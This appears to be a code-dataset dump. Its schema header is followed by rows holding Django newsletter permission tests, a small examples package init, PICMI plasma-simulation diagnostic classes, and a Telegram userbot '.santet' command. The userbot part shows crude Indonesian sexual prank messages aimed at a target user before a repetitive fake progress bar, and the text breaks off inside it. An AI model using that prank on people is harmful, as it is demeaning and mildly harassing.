hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
42563137040a63ac1825149675ebdbdc98177c75
| 9,019
|
py
|
Python
|
newsletter/tests/tests_post_update_view.py
|
hbuyse/dj-newsletter
|
2c032466e648b3c844bea6aae379a5346d9ce677
|
[
"MIT"
] | null | null | null |
newsletter/tests/tests_post_update_view.py
|
hbuyse/dj-newsletter
|
2c032466e648b3c844bea6aae379a5346d9ce677
|
[
"MIT"
] | null | null | null |
newsletter/tests/tests_post_update_view.py
|
hbuyse/dj-newsletter
|
2c032466e648b3c844bea6aae379a5346d9ce677
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
# coding=utf-8
"""Tests the modification view of a post."""
# Django
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.test import TestCase, override_settings, tag
from django.urls import reverse
# Current django project
from newsletter.models import Post
from newsletter.tests.utils import create_user
@override_settings(LOGIN_URL="/toto/")
@tag('post', 'view', 'update', 'anonymous')
class TestPostUpdateViewAsAnonymous(TestCase):
"""Tests the modification view of a post as an anonymous user."""
@classmethod
def setUpTestData(cls):
"""Set up for all the following tests."""
cls.dict, cls.user = create_user()
d = {
'author': cls.user,
'text': 'Text',
'title': 'Title'
}
cls.post = Post.objects.create(**d)
def test_get_redirected_to_login(self):
"""Get should be redirected to the login page."""
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertRedirects(response, "/toto/?next=/{}/update/".format(self.post.id), fetch_redirect_response=False)
def test_post_redirected_to_login(self):
"""Post should be redirected to the login page."""
d = {
'title': 'My title'
}
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), d)
self.assertRedirects(response, "/toto/?next=/{}/update/".format(self.post.id), fetch_redirect_response=False)
@tag('post', 'view', 'update', 'logged')
class TestPostUpdateViewAsLogged(TestCase):
"""Tests."""
@classmethod
def setUpTestData(cls):
"""Set up for all the following tests."""
cls.dict, cls.user = create_user()
d = {
'author': cls.user,
'text': 'Text',
'title': 'Title'
}
cls.post = Post.objects.create(**d)
def test_posts_create_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertEqual(response.status_code, 403)
def test_posts_create_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
d = {
'text': 'Text',
'title': 'My title'
}
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), d)
self.assertEqual(response.status_code, 403)
def test_posts_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertFalse(self.user.has_perm('newsletter.change_post'))
self.user.user_permissions.add(Permission.objects.get(name='Can change post'))
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertEqual(response.status_code, 200)
def test_posts_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
perms = 'newsletter.change_post'
d = {
'text': 'Text',
'title': 'My title'
}
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertFalse(self.user.has_perm(perms))
self.user.user_permissions.add(Permission.objects.get(codename=perms.split('.')[1]))
# Permission caching (https://docs.djangoproject.com/en/2.1/topics/auth/default/#permission-caching)
# Need to refetch the user to get the new permissions
self.user = get_user_model().objects.get(id=self.user.id)
self.assertTrue(self.user.has_perm(perms))
# Next test
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), data=d)
self.assertEqual(len(Post.objects.all()), 1)
self.assertRedirects(response, "/{}/{}/{}/{}/".format(self.post.created.year, self.post.created.month, self.post.created.day, self.post.id), fetch_redirect_response=False)
@tag('post', 'view', 'update', 'staff')
class TestPostUpdateViewAsStaff(TestCase):
"""Tests."""
@classmethod
def setUpTestData(cls):
"""Set up for all the following tests."""
cls.dict, cls.user = create_user(staff=True)
d = {
'author': cls.user,
'text': 'Text',
'title': 'Title'
}
cls.post = Post.objects.create(**d)
def test_posts_create_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertEqual(response.status_code, 403)
def test_posts_create_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
d = {
'text': 'Text',
'title': 'My title'
}
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), d)
self.assertEqual(response.status_code, 403)
def test_posts_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertFalse(self.user.has_perm('newsletter.change_post'))
self.user.user_permissions.add(Permission.objects.get(name='Can change post'))
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertEqual(response.status_code, 200)
def test_posts_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
perms = 'newsletter.change_post'
d = {
'text': 'Text',
'title': 'My title'
}
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertFalse(self.user.has_perm(perms))
self.user.user_permissions.add(Permission.objects.get(codename=perms.split('.')[1]))
# Permission caching (https://docs.djangoproject.com/en/2.1/topics/auth/default/#permission-caching)
# Need to refetch the user to get the new permissions
self.user = get_user_model().objects.get(id=self.user.id)
self.assertTrue(self.user.has_perm(perms))
# Next test
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), data=d)
self.assertEqual(len(Post.objects.all()), 1)
self.assertRedirects(response, "/{}/{}/{}/{}/".format(self.post.created.year, self.post.created.month, self.post.created.day, self.post.id), fetch_redirect_response=False)
@tag('post', 'view', 'update', 'superuser')
class TestPostUpdateViewAsSuperuser(TestCase):
"""Tests the modification of a post as superuser.
Unlike simple user or staff user, superuser already has the rights to do whatever he/she wants.
"""
@classmethod
def setUpTestData(cls):
"""Set up for all the following tests."""
cls.dict, cls.user = create_user(superuser=True)
d = {
'author': cls.user,
'text': 'Text',
'title': 'Title'
}
cls.post = Post.objects.create(**d)
def test_posts_create_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertTrue(self.user.has_perm('newsletter.change_post'))
response = self.client.get(reverse('newsletter:post-update', kwargs={'pk': self.post.id}))
self.assertEqual(response.status_code, 200)
def test_posts_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
perms = 'newsletter.change_post'
d = {
'text': 'Text',
'title': 'My title'
}
self.assertTrue(self.client.login(username=self.dict['username'], password=self.dict['password']))
self.assertTrue(self.user.has_perm(perms))
# Next test
response = self.client.post(reverse('newsletter:post-update', kwargs={'pk': self.post.id}), data=d)
self.assertEqual(len(Post.objects.all()), 1)
self.assertRedirects(response, "/{}/{}/{}/{}/".format(self.post.created.year, self.post.created.month, self.post.created.day, self.post.id), fetch_redirect_response=False)
| 41.562212
| 179
| 0.649074
| 1,108
| 9,019
| 5.150722
| 0.123646
| 0.037848
| 0.029788
| 0.056772
| 0.87419
| 0.87419
| 0.87419
| 0.850359
| 0.850359
| 0.850359
| 0
| 0.004284
| 0.197694
| 9,019
| 216
| 180
| 41.75463
| 0.784411
| 0.105777
| 0
| 0.785714
| 0
| 0
| 0.126292
| 0.05571
| 0
| 0
| 0
| 0
| 0.235714
| 1
| 0.114286
| false
| 0.071429
| 0.042857
| 0
| 0.185714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
42576335c0f6ef9464d52ec52b4c65d3223584ba
| 155
|
py
|
Python
|
examples/__init__.py
|
nprezant/GAlgorithm
|
5259281fb7ed0efe1effcdc39ae1850c0a47b9a5
|
[
"MIT"
] | 1
|
2021-12-18T23:25:12.000Z
|
2021-12-18T23:25:12.000Z
|
examples/__init__.py
|
nprezant/GAlgorithm
|
5259281fb7ed0efe1effcdc39ae1850c0a47b9a5
|
[
"MIT"
] | 1
|
2022-03-12T01:04:13.000Z
|
2022-03-12T01:04:13.000Z
|
examples/__init__.py
|
nprezant/GAlgorithm
|
5259281fb7ed0efe1effcdc39ae1850c0a47b9a5
|
[
"MIT"
] | null | null | null |
from .knapsack import run as run_knapsack
from .sentences import run as run_sentences
from .tsp import run as run_tsp
from .tsp import plot_individual_csv
| 31
| 43
| 0.832258
| 27
| 155
| 4.592593
| 0.37037
| 0.217742
| 0.266129
| 0.33871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141935
| 155
| 4
| 44
| 38.75
| 0.932331
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
425b3d3b0191cb00f54e08a9c5379d86146c6d14
| 9,504
|
py
|
Python
|
PICMI_Python/diagnostics.py
|
tsung1029/picmi
|
ca94beaec18759d0ed45d54ac4dd0917a7edd50f
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
PICMI_Python/diagnostics.py
|
tsung1029/picmi
|
ca94beaec18759d0ed45d54ac4dd0917a7edd50f
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
PICMI_Python/diagnostics.py
|
tsung1029/picmi
|
ca94beaec18759d0ed45d54ac4dd0917a7edd50f
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
"""Classes following the PICMI standard
These should be the base classes for Python implementation of the PICMI standard
The classes in the file are all diagnostics related
"""
from .base import _ClassWithInit
# ----------------------------
# Simulation frame diagnostics
# ----------------------------
class PICMI_FieldDiagnostic(_ClassWithInit):
"""
Defines the electromagnetic field diagnostics in the simulation frame
- grid: Grid object for the diagnostic
- period=1: Period of time steps that the diagnostic is performed
- data_list=["rho", "E", "B", "J"]: List of quantities to write out
- write_dir='.': Directory where data is to be written
- step_min=None: Minimum step at which diagnostics could be written (optional)
Defaults to step 0.
- step_max=None: Maximum step at which diagnostics could be written (optional)
Defaults to no limit.
- number_of_cells=None: Number of cells in each dimension (optional)
If not given, will be obtained from grid.
- lower_bound=None: Lower corner of diagnostics box in each direction (optional)
If not given, will be obtained from grid.
- upper_bound=None: Higher corner of diagnostics box in each direction (optional)
If not given, will be obtained from grid.
- parallelio=None: If set to True, field diagnostics are dumped in parallel (optional)
- name: Sets the base name for the diagnostic output files (optional)
"""
def __init__(self, grid, period = 1,
data_list = ["rho", "E", "B", "J"],
write_dir = None,
step_min = None,
step_max = None,
number_of_cells = None,
lower_bound = None,
upper_bound = None,
parallelio = None,
name = None,
**kw):
self.grid = grid
self.period = period
self.data_list = data_list
self.write_dir = write_dir
self.step_min = step_min
self.step_max = step_max
if number_of_cells is None:
number_of_cells = grid.number_of_cells
if lower_bound is None:
lower_bound = grid.lower_bound
if upper_bound is None:
upper_bound = grid.upper_bound
self.number_of_cells = number_of_cells
self.lower_bound = lower_bound
self.upper_bound = upper_bound
self.parallelio = parallelio
self.name = name
self.handle_init(kw)
class PICMI_ElectrostaticFieldDiagnostic(_ClassWithInit):
"""
Defines the electrostatic field diagnostics in the simulation frame
- grid: Grid object for the diagnostic
- period=1: Period of time steps that the diagnostic is performed
- data_list=["rho", "phi"]: List of quantities to write out
- write_dir='.': Directory where data is to be written
- step_min=None: Minimum step at which diagnostics could be written (optional)
Defaults to step 0.
- step_max=None: Maximum step at which diagnostics could be written (optional)
Defaults to no limit.
- number_of_cells=None: Number of cells in each dimension (optional)
If not given, will be obtained from grid.
- lower_bound=None: Lower corner of diagnostics box in each direction (optional)
If not given, will be obtained from grid.
- upper_bound=None: Higher corner of diagnostics box in each direction (optional)
If not given, will be obtained from grid.
- parallelio=None: If set to True, field diagnostics are dumped in parallel (optional)
- name: Sets the base name for the diagnostic output files (optional)
"""
def __init__(self, grid, period = 1,
data_list = ["rho", "phi"],
write_dir = None,
step_min = None,
step_max = None,
number_of_cells = None,
lower_bound = None,
upper_bound = None,
parallelio = None,
name = None,
**kw):
self.grid = grid
self.period = period
self.data_list = data_list
self.write_dir = write_dir
self.step_min = step_min
self.step_max = step_max
if number_of_cells is None:
number_of_cells = grid.number_of_cells
if lower_bound is None:
lower_bound = grid.lower_bound
if upper_bound is None:
upper_bound = grid.upper_bound
self.number_of_cells = number_of_cells
self.lower_bound = lower_bound
self.upper_bound = upper_bound
self.parallelio = parallelio
self.name = name
self.handle_init(kw)
class PICMI_ParticleDiagnostic(_ClassWithInit) :
"""
Defines the particle diagnostics in the simulation frame
- period=1: Period of time steps that the diagnostic is performed
- species: Species or list of species to write out
Note that the name attribute must be defined for the species.
- data_list=["position", "momentum", "weighting"]: The data to be written out
- write_dir='.': Directory where data is to be written
- step_min=None: Minimum step at which diagnostics could be written (optional)
Defaults to step 0.
- step_max=None: Maximum step at which diagnostics could be written (optional)
Defaults to no limit.
- parallelio=None: If set to True, particle diagnostics are dumped in parallel (optional)
- name: Sets the base name for the diagnostic output files (optional)
"""
def __init__(self, period = 1,
species = None,
data_list = ["position", "momentum", "weighting"],
write_dir = None,
step_min = None,
step_max = None,
parallelio = None,
name = None,
**kw):
self.period = period
self.species = species
self.data_list = data_list
self.write_dir = write_dir
self.step_min = step_min
self.step_max = step_max
self.parallelio = parallelio
self.name = name
self.handle_init(kw)
# ----------------------------
# Lab frame diagnostics
# ----------------------------
class PICMI_LabFrameFieldDiagnostic(_ClassWithInit):
"""
Defines the electromagnetic field diagnostics in the lab frame
- grid: Grid object for the diagnostic
- num_snapshots: Number of lab frame snapshots to make
- dt_snapshots: Time between each snapshot in lab frame
- z_subsampling=1: A factor which is applied on the resolution of the lab frame reconstruction. (integer)
- time_start=0.: Time for the first snapshot in lab frame
- data_list=["rho", "E", "B", "J"]: List of quantities to write out
- write_dir='.': Directory where data is to be written
- parallelio=None: If set to True, field diagnostics are dumped in parallel (optional)
- name: Sets the base name for the diagnostic output files (optional)
"""
def __init__(self, grid, num_snapshots, dt_snapshots,
z_subsampling = 1, time_start = 0.,
data_list = ["rho", "E", "B", "J"],
write_dir = None,
parallelio = None,
name = None,
**kw):
self.grid = grid
self.num_snapshots = num_snapshots
self.dt_snapshots = dt_snapshots
self.z_subsampling = z_subsampling
self.time_start = time_start
self.data_list = data_list
self.write_dir = write_dir
self.parallelio = parallelio
self.name = name
self.handle_init(kw)
class PICMI_LabFrameParticleDiagnostic(_ClassWithInit):
"""
Defines the particle diagnostics in the lab frame
- grid: Grid object for the diagnostic
- num_snapshots: Number of lab frame snapshots to make
- dt_snapshots: Time between each snapshot in lab frame
- time_start=0.: Time for the first snapshot in lab frame
- species: Species or list of species to write out
Note that the name attribute must be defined for the species.
- data_list=["position", "momentum", "weighting"]: The data to be written out
- write_dir='.': Directory where data is to be written
- parallelio=None: If set to True, particle diagnostics are dumped in parallel (optional)
- name: Sets the base name for the diagnostic output files (optional)
"""
def __init__(self, grid, num_snapshots, dt_snapshots,
time_start = 0.,
species = None,
data_list = ["position", "momentum", "weighting"],
write_dir = None,
parallelio = None,
name = None,
**kw):
self.grid = grid
self.num_snapshots = num_snapshots
self.dt_snapshots = dt_snapshots
self.time_start = time_start
self.species = species
self.data_list = data_list
self.write_dir = write_dir
self.parallelio = parallelio
self.name = name
self.handle_init(kw)
| 40.442553
| 111
| 0.598906
| 1,149
| 9,504
| 4.793734
| 0.114012
| 0.029049
| 0.037763
| 0.023965
| 0.900871
| 0.898148
| 0.890886
| 0.871641
| 0.856935
| 0.849855
| 0
| 0.002331
| 0.322917
| 9,504
| 234
| 112
| 40.615385
| 0.853613
| 0.502841
| 0
| 0.905983
| 0
| 0
| 0.015493
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042735
| false
| 0
| 0.008547
| 0
| 0.094017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
35f337cabf4e34a760d82d0a8d08836f379ad0fe
| 9,884
|
py
|
Python
|
userbot/modules/santet.py
|
bryanasfuk/Venom
|
8ac37b718786f05a9ea63418509c41d148e3ec54
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/santet.py
|
bryanasfuk/Venom
|
8ac37b718786f05a9ea63418509c41d148e3ec54
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/santet.py
|
bryanasfuk/Venom
|
8ac37b718786f05a9ea63418509c41d148e3ec54
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
from time import sleep
from userbot import CMD_HELP
from userbot.events import register
@register(outgoing=True, pattern=r"^\.santet(?: |$)(.*)")
async def typewriter(typew):
typew.pattern_match.group(1)
await typew.edit("`Telah Mengaktifkan Perintah Mencolok Bool 😈`")
sleep(2)
await typew.edit("`Mencari Bool Orang Ini...`")
sleep(1)
await typew.edit("`Pertusukan Akan Segera Dilakukan`")
sleep(1)
await typew.edit("`Sange Aktifkan`")
sleep(1)
await typew.edit("0%")
number = 1
await typew.edit(str(number) + "% ▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ████████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% █████████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ██████████████▉")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████▎")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████▍")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████▌")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████▊")
number = number + 1
sleep(0.03)
await typew.edit(str(number) + "% ███████████████▉")
